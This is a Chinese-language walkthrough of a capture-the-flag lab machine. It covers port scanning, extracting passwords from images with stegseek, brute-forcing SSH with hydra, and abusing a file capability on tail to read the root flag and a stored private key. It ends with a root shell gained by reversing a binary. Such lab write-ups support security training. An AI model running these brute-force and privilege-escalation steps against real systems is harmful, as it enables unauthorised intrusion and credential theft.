信息搜集

主机扫描

aep-scan -l

端口扫描

┌──(root㉿kali)-[~]
└─# nmap -sV -p- 192.168.254.27 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-27 03:44 EDT
Nmap scan report for 192.168.254.27
Host is up (0.00043s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
80/tcp   open  http    nginx 1.14.2
2222/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
MAC Address: 08:00:27:5B:90:01 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

80端口

发现两张猫咪图片,提示说藏有东西,于是猜测隐写,直接全部下载下来

┌──(root㉿kali)-[~]
└─# stegseek '/home/kali/Desktop/Untitled'       
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek

[i] Found passphrase: "sexymama"
[i] Original filename: "mateo.txt".
[i] Extracting to "Untitled.out".

┌──(root㉿kali)-[~/cat/1]
└─# stegseek '/home/kali/Desktop/Untitled.jpeg'                                
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek

[i] Found passphrase: "westlife"
[i] Original filename: "markus.txt".
[i] Extracting to "Untitled.jpeg.out".

发现很多字符密码,但没有一一对应,于是做成字典爆破

Matthew
sexymama
markus
Westlife
markuslovesbonita
thisismypassword   > pass.txt

利用九头蛇爆破

┌──(root㉿kali)-[~]
└─# hydra -L  pass.txt -P pass.txt ssh://192.168.254.27:2222 
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-05-26 10:49:17
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 49 login tries (l:7/p:7), ~4 tries per task
[DATA] attacking ssh://192.168.254.27:2222/
[2222][ssh] host: 192.168.254.27   login: mateo   password: thisismypassword
[2222][ssh] host: 192.168.254.27   login: markus   password: markuslovesbonita
1 of 1 target successfully completed, 2 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-05-26 10:49:27

获取shell

既然已经发现了用户,呢么直接开始ssh登录,搜集信息

mateo

mateo@twisted:~$ cat note.txt 
/var/www/html/gogogo.wav
发现一个音频,听起来是一段摩斯,利用工具,发现是fake,骗你用的,嘁

markus

发现一个note.txt,存在id_rsa,cat无法读取,看有没有其他方法,

markus@twisted:~$ cat note.txt 
Hi bonita,
I have saved your id_rsa here: /var/cache/apt/id_rsa
Nobody can find it.

通过老步骤,发现tail可一执行

/usr/sbin/getcap -r / 2>/dev/null
/usr/bin/ping = cap_net_raw+ep
/usr/bin/tail = cap_dac_read_search+ep
这个表达式的意思是为 /usr/bin/tail 命令设置 cap_dac_read_search 权限,使其可以忽略文件的读权限检查并实际生效。通过这种方式,tail 命令可以读取本来无权访问的文件。

那么意味着我们可以直接使用这个文件读取重要文件,比如

markus@twisted:/tmp$ tail /root/root.txt
HMVwhereismycat

提权

既然这样我们也能读取我们的id_rsa的文件内容

tail -n 50 /var/cache/apt/id_rsa
显示文件的左后50行,
vi id_rsa
chmod 600 id_rsa
ssh -i id_rsa bonita@127.0.0.1 -p 2222

运行beroot,发现需要root,于是下载下来看看,分析发现当输入5880,可以执行/bin/bash,获取权限

知识点

  1. /usr/sbin/getcap -r / 2>/dev/null命令的使用
  2. 逆向文件分析